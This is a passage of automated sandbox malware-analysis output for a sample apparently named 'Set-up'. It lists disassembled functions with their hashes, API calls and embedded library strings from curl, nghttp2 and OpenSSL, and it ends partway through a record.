Opcode Fuzzy Hash: c8165b5364eafa5466f7f3cfec5caf63cd4ca5c3c0713600e2f16d14c16ff28a
Instruction Fuzzy Hash: C7519371504300AFDB209F24DC45B6B7BE4AF4A718F14592DF559AB392E771B8088B62

Function 00E4C560 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 147COMMON

Download Yara Rule

Strings

stream->queued == 1, xrefs: 00E4C9C5
nghttp2_session.c, xrefs: 00E4C9C0, 00E4C9D5, 00E4C9EA
urgency < NGHTTP2_EXTPRI_URGENCY_LEVELS, xrefs: 00E4C9DA

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID:
String ID: nghttp2_session.c$stream->queued == 1$urgency < NGHTTP2_EXTPRI_URGENCY_LEVELS
API String ID: 0-1712496329
Opcode ID: 7db0bcf75f6c9581462f0892bd344ff7b1626ab275014143ba618f814766794a
Instruction ID: 74e255b2401d43d4ce3f79c682339f8d3f1406fedf908125f213f9fca068e49d
Opcode Fuzzy Hash: 7db0bcf75f6c9581462f0892bd344ff7b1626ab275014143ba618f814766794a
Instruction Fuzzy Hash: B441AB707017406BEB658B39BC99BBA77D49F0130AF1C247DF91AE7182EB14EA108B61

Function 00DC6220 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143stringCOMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00DC623A
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00DC624D
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00DC627C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00DC6389

Strings

., xrefs: 00DC6399
hsts.c, xrefs: 00DC62C9, 00DC62DB, 00DC6339, 00DC634B

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: strlen$_time64memcpy
String ID: .$hsts.c
API String ID: 2198566249-2242870694
Opcode ID: f922f61e4d70bd7d7d8b28d6436c35783771c3f2643d0ccd12919c755a7faad8
Instruction ID: 47b7f6b6ff4c8cb837f2231b284ad3c12be3d7083e4688a220d960d7620f8120
Opcode Fuzzy Hash: f922f61e4d70bd7d7d8b28d6436c35783771c3f2643d0ccd12919c755a7faad8
Instruction Fuzzy Hash: 9541B9A6D183866BEB107E64AC45F6B7698DF24319F0C043CFD4A53243F576E9188AB2

Function 01144430 Relevance: 10.6, APIs: 7, Instructions: 108stringnetworkCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,0000002E), ref: 0114447B
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000042), ref: 011444C4
WSAStringToAddressW.WS2_32(?,00000002,00000000,?,00000010), ref: 011444E3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(0000002E), ref: 01144500
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0114450B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,0000002E), ref: 0114451F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 01144546

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: strlen$strcmp$AddressByteCharMultiStringWide
String ID:
API String ID: 389649969-0
Opcode ID: c799aba708414ee2d585f1c90d957361d0dbcca9aa353c82be337f84c731f30c
Instruction ID: 3516d6a95bc988ba4c64a14e94de29650528203e482a8463b15748860144e87e
Opcode Fuzzy Hash: c799aba708414ee2d585f1c90d957361d0dbcca9aa353c82be337f84c731f30c
Instruction Fuzzy Hash: E9314DB19043056BFB249A78DC01BBF768C9B91B58F044628F998D65C1F774E94483E2

Function 01002240 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,00FFF763,?,?,?,?,?), ref: 01002251
WideCharToMultiByte.KERNEL32 ref: 01002284
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 010022BD

Strings

engines/e_capi.c, xrefs: 01002299, 010022D0, 01002342
engines/e_capi_err.c, xrefs: 01002321
ERR_CAPI_error, xrefs: 0100231A

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: ByteCharMultiWide$wcslen
String ID: ERR_CAPI_error$engines/e_capi.c$engines/e_capi_err.c
API String ID: 1062461220-336193293
Opcode ID: cbcda16fc1923aeaf390ce25f5c204d6feef664f899c6f7178be3862972789f1
Instruction ID: 6e0fd142adebaf666f4b5b4e7fc93290a09dc5b2e1ef3f89fdbb87b62f988a85
Opcode Fuzzy Hash: cbcda16fc1923aeaf390ce25f5c204d6feef664f899c6f7178be3862972789f1
Instruction Fuzzy Hash: D321FD71E443046BF7713A61AC4AF2B3B989B80718F14C13EFA4C552D6E6F854549BA2

Function 0126C2E0 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0126C2F9
calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0126C313
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0126C3C1

Part of subcall function 01270790: calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00000000,0126C32A), ref: 012707A3
Part of subcall function 01270790: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00000000,0126C32A), ref: 012707C2

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0126C37B
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0126C3AB
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0126C3B3

Strings

4, xrefs: 0126C2E6

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: free$calloc$malloc
String ID: 4
API String ID: 3103867982-4088798008
Opcode ID: 360e3762e2f7b3f8c010b11a591326a713bae00a8fc3fa54463c7ca9ca2ec111
Instruction ID: 4770f969410bfb8f058aaa824797e2e4084a56db39078f87b98edd83434ccc08
Opcode Fuzzy Hash: 360e3762e2f7b3f8c010b11a591326a713bae00a8fc3fa54463c7ca9ca2ec111
Instruction Fuzzy Hash: C5215BB181670A8BDB10BF78D4843AEBBE4EF10318F014A1DD9D85B281D774DA548BD1

Function 00E687E0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 61COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(n <= balloc->blklen,nghttp3_balloc.c,00000042,?,00000000,?,00E64D5A,00000000,?,000001F0), ref: 00E68861
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(((uintptr_t)balloc->buf.last & 0xfu) == 0,nghttp3_balloc.c,00000055,?,000001F0), ref: 00E68873

Strings

ZM, xrefs: 00E687E7, 00E68807
nghttp3_balloc.c, xrefs: 00E68857, 00E68869
((uintptr_t)balloc->buf.last & 0xfu) == 0, xrefs: 00E6886E
n <= balloc->blklen, xrefs: 00E6885C

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: _assert
String ID: ((uintptr_t)balloc->buf.last & 0xfu) == 0$ZM$n <= balloc->blklen$nghttp3_balloc.c
API String ID: 1222420520-44229374
Opcode ID: 8d8a10ae946a06db60f55a86458e1f8c54367986d016f51b5e7efdabf03c1ce9
Instruction ID: c2abdc625d85ad80515fd3a6f4075fb60d65298852318341155176eb53dba60a
Opcode Fuzzy Hash: 8d8a10ae946a06db60f55a86458e1f8c54367986d016f51b5e7efdabf03c1ce9
Instruction Fuzzy Hash: E61125B6A80711AFC2008F64FC41906F3A4FB50B79B441628F814A3382CB30EC64CBE5

Function 0126C3F0 Relevance: 9.2, APIs: 6, Instructions: 229COMMON

Download Yara Rule

APIs

setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 0126C435
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 0126C445
setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 0126C467

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: setlocale$_strdup
String ID:
API String ID: 134968984-0
Opcode ID: 0abecfa04214675a3fb452dd43cd944e46d551eec81125602ef4aeac15c5f0f2
Instruction ID: 338dcc63b233aafbd0cb2b8a8cf6bef19bd7947abb0c40ebad4937d45bd6ebcf
Opcode Fuzzy Hash: 0abecfa04214675a3fb452dd43cd944e46d551eec81125602ef4aeac15c5f0f2
Instruction Fuzzy Hash: 4D918C706187468FD710DF29C48175ABBE5FF89318F044A2EEAD897381D374E999CB82

Function 00F781F0 Relevance: 9.2, APIs: 5, Strings: 1, Instructions: 198stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,00F1A9CE,000000D2), ref: 00F783A3
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F1A9CE), ref: 00F783C6

Part of subcall function 00F760E0: GetLastError.KERNEL32(00F77CCC,?,00000000,00F77127,00F77CCC,00000000,00F9CAB7,00DC1A70), ref: 00F760E3
Part of subcall function 00F760E0: SetLastError.KERNEL32(00000000), ref: 00F761A5

Strings

crypto/err/err_local.h, xrefs: 00F78311, 00F78332, 00F78385, 00F783E8, 00F784BB

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: ErrorLast$strcpystrlen
String ID: crypto/err/err_local.h
API String ID: 542397150-344804083
Opcode ID: 3ff4fd0f540310a20f1197e00c8154a2203b687fd01bfbfb97f4bf31ddbdc3ff
Instruction ID: 39aa06d02be277176bdc0b2102963f8f589d9aea2ff46c186aced5f175ce40ec
Opcode Fuzzy Hash: 3ff4fd0f540310a20f1197e00c8154a2203b687fd01bfbfb97f4bf31ddbdc3ff
Instruction Fuzzy Hash: 6181D471940B01AFE7238F28EC89BE2B7D0FB4031CF44891DE6C9872A5DB79A415DB51

Function 00DC6730 Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 179stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00DC73F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,#HttpOnly_,?,00DCCA95,013A6A38,00000467,mprintf.c), ref: 00DC741D
Part of subcall function 00DC73F0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000008,?,00000001), ref: 00DC7445

Part of subcall function 00E047D0: fgets.API-MS-WIN-CRT-STDIO-L1-1-0(00000080,00000080,?), ref: 00E047FB
Part of subcall function 00E047D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00E0480C
Part of subcall function 00E047D0: feof.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00E04837

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 00DC6844
memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,unlimited,0000000A), ref: 00DC6876
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00DC68FD

Strings

unlimited, xrefs: 00DC686C
%256s "%64[^"]", xrefs: 00DC6857
hsts.c, xrefs: 00DC6748, 00DC675D, 00DC6777, 00DC691D, 00DC694E, 00DC696F

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: strlen$feoffgetsmemcmpmemcpy
String ID: %256s "%64[^"]"$hsts.c$unlimited
API String ID: 288886899-2895786126
Opcode ID: fdbdbc7e8e2b1b01452644d508f215f63196d0994fc656c3181b6ea6819d59e2
Instruction ID: e6342f14a38c242b407538fd0885d34191f6ea15a44fd7f3f3d293b75a44a756
Opcode Fuzzy Hash: fdbdbc7e8e2b1b01452644d508f215f63196d0994fc656c3181b6ea6819d59e2
Instruction Fuzzy Hash: 465106B19443427FDB20AB209C42F2B7698DF95705F18482CF988A73C2F631DA04CAB3

Function 00FB8240 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 63stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000001,00FB9265,?,00000400,00000000,?), ref: 00FB8254
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00FB9265,?), ref: 00FB8264
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00FB9265,?,?,?,?,?,?,00FB9265,?,00000400,00000000,?), ref: 00FB82C7

Strings

Enter PEM pass phrase:, xrefs: 00FB8279, 00FB828C
PEM_def_callback, xrefs: 00FB82A1
crypto/pem/pem_lib.c, xrefs: 00FB82A8

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: memcpymemsetstrlen
String ID: Enter PEM pass phrase:$PEM_def_callback$crypto/pem/pem_lib.c
API String ID: 160209724-3271887637
Opcode ID: 24e80b4fd31b18fd25e0cfe2153a1dc84b7083865915fa515cb947bf4e658535
Instruction ID: 8550223822898cbbe63a2f98936656cacbe9745ab2e583461b83be21fdaf06e6
Opcode Fuzzy Hash: 24e80b4fd31b18fd25e0cfe2153a1dc84b7083865915fa515cb947bf4e658535
Instruction Fuzzy Hash: A30140E2B043113BF51075656C82F6F365CCBD5EA4F14013AFE4992182F660DC16A5B3

Function 01148920 Relevance: 9.0, APIs: 6, Instructions: 30COMMON

Download Yara Rule

APIs

_initialize_narrow_environment.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 01148928
_configure_narrow_argv.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00DC115A), ref: 0114893D
__p___argc.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00DC115A), ref: 01148942
__p___argv.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00DC115A), ref: 0114894F
__p__environ.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00DC115A), ref: 0114895C
_set_new_mode.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00DC115A), ref: 01148972

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: __p___argc__p___argv__p__environ_configure_narrow_argv_initialize_narrow_environment_set_new_mode
String ID:
API String ID: 3593706420-0
Opcode ID: 1efc63e94736ec762dde092320e3d59adf545601741b22b2780315d7096a2df3
